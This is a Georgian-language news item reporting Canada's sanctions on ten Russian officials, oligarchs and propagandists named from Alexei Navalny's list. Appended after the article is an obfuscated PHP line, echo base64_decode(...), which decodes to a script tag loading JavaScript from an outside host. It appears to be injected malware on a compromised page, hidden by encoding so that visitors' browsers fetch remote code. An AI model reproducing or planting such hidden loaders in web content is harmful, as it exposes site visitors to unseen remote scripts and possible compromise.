celsiusi
ავერსი საქკაბელი
კანადის პრემიერ-მინისტრმა ჯასტინ ტრუდომ დღეს რუსეთის წინააღმდეგ ახალი სანქციების შესახებ განაცხადა, რომელშიც რუსეთის 10 მოქალაქე მოხვდა, ვინც უკრაინაში რუსეთის გაუმართლებელ შეჭრაშია მონაწილე.
 
CNN-ის ცნობით, ამის შესახებ პრემიერმა ლონდონში თავის ნიდერლანდელ და ბრიტანელ კოლეგებთან ერთობლივ ბრიფინგზე განაცხადა.
 
ტრუდოს თქმით, აღნიშნულ პირებს შორის არიან რუსეთის მთავრობის ყოფილი და ამჟამინდელი წევრები, ოლიგარქები და რუსეთის ხელისუფლების მომხრეები.
 
„ამ პირთა სახელები აღებულია სიიდან, რომელიც შედგენილია პატიმრობაში მყოფი ოპოზიციონერის ალექსეი ნავალნის მიერ. სანქციები აძლიერებს რუსეთის ხელისუფლებაზე ზეწოლას, მათ შორის, პუტინის უახლოეს გარემოცვაზე“, - განაცხადა ტრუდომ.
 
სასანქციო სიაში მოხვდნენ კრემლის სპიკერი დიმიტრი პესკოვი, რუსი ოლიგარქი ოლეგ დერიპასკა, ჯანდაცვის მინისტრი მიხაილ მურაშკო, სოფლის მეურნეობის მინისტრი დიმიტრი პატრუშევი, დუმის დეპუტატი პაველ კრაშენიკოვი, ტელეწამყვანი ვლადიმერ სალავიოვი, „რაშა თუდეის“ მთავარი რედაქტორი მარგარიტა სიმონიანი, პირველი არხის გენერალური დირექტორი კონსტანტინ ერნსტი და სხვები.
917
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");